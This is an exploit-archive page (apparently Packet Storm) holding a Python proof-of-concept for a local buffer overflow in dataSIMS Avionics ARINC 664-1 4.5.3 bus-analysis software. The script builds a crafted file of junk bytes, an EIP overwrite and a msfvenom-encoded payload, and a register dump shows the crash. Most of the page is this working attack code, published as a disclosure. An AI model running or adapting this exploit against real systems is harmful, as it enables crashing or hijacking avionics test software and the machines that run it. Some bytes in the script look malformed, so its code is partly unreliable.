what you don't know can hurt you

dataSIMS Avionics ARINC 664-1 4.5.3 Buffer Overflow

dataSIMS Avionics ARINC 664-1 4.5.3 Buffer Overflow
Posted Feb 19, 2021
Authored by Kagan Capar

dataSIMS Avionics ARINC 664-1 version 4.5.3 suffers from a local buffer overflow vulnerability.

tags | exploit, overflow, local
MD5 | b35c61735f270473a31e925b82681d2e

dataSIMS Avionics ARINC 664-1 4.5.3 Buffer Overflow

Change Mirror Download
# Exploit Title: dataSIMS Avionics ARINC 664-1 - Local Buffer Overflow (PoC)
# Exploit Author: Kagan Capar
# Date: 2020-02-17
# Vendor Homepage: https://www.ddc-web.com/
# Software Link: https://www.ddc-web.com/en/connectivity/databus/milstd1553-1/software-1/bu-69414?partNumber=BU-69414
# Version: 4.5.3
# Tested On: Windows 10 Enterprise (x64)
# about Sofware:
# dataSIMS, an all-in-one Avionics Bus Analysis & Simulation Software Tool, provides an easy-to-use graphical interface, simplifying any MIL-STD-1553 or ARINC 429 testing effort.
# about ARINC 664-1:
# ARINC 664 is a multipart specification that defines an Ethernet data network for aircraft installations.
# Part 7 of ARINC 664 defines a deterministic network, also known as Avionics Full Duplex Switched Ethernet (or AFDX®).

#!/usr/bin/env python
# -*- coding: UTF-8 -*-

import struct
import binascii
import os
import sys

#EAX : 00000000
#EBX : 00000000
#ECX : 42424242
#EDX : 77B96330 ntdll.77B96330
#EBP : 000A1328
#ESP : 000A1308
#ESI : 00000000
#EDI : 00000000
#EIP : 42424242
#EFLAGS : 00010246

#LastError : 00000000 (ERROR_SUCCESS)
#LastStatus : C0000034 (STATUS_OBJECT_NAME_NOT_FOUND)
#Last chance expection on 42424242 (C0000005, EXPECTION_ACCESS_VIOLATION)!

file = open("milstd1553result.txt", "w")
junk = "\x41" * 600
align = "\x32" * 4 + "\x31" * 4
prop = "\x43" * 380
imp = "\x62\x7a\x68\x72\x74\x75\x72\x6c\x75\x32"
imp2 = "\x61\x72\x61\x63\x61\x67\x131\x7a"

#EIP Overwrite junk value
overwrite = "\x42" * 4

#Payload size: 29 bytes
#Final size of py file: 160 bytes

#msfvenom -p generic/tight_loop --platform windows_86 -f py -e x86/shikata_ga_nai

buf = b""
buf += b"\xda\xc1\xd9\x74\x24\xf4\x58\xbb\x0b\x7e\x97\x62\x33"
buf += b"\xc9\xb1\x01\x31\x58\x19\x83\xe8\xfc\x03\x58\x15\xe9"
buf += b"\x8b\x7c\x9c"

win32 = junk + align + prop + imp + imp2 + overwrite + buf

print len(win32)
file.write(win32)
file.close()


Login or Register to add favorites

File Archive:

February 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    33 Files
  • 2
    Feb 2nd
    30 Files
  • 3
    Feb 3rd
    15 Files
  • 4
    Feb 4th
    8 Files
  • 5
    Feb 5th
    11 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    1 Files
  • 8
    Feb 8th
    37 Files
  • 9
    Feb 9th
    15 Files
  • 10
    Feb 10th
    11 Files
  • 11
    Feb 11th
    26 Files
  • 12
    Feb 12th
    8 Files
  • 13
    Feb 13th
    1 Files
  • 14
    Feb 14th
    1 Files
  • 15
    Feb 15th
    9 Files
  • 16
    Feb 16th
    33 Files
  • 17
    Feb 17th
    6 Files
  • 18
    Feb 18th
    10 Files
  • 19
    Feb 19th
    20 Files
  • 20
    Feb 20th
    1 Files
  • 21
    Feb 21st
    1 Files
  • 22
    Feb 22nd
    17 Files
  • 23
    Feb 23rd
    15 Files
  • 24
    Feb 24th
    16 Files
  • 25
    Feb 25th
    28 Files
  • 26
    Feb 26th
    25 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close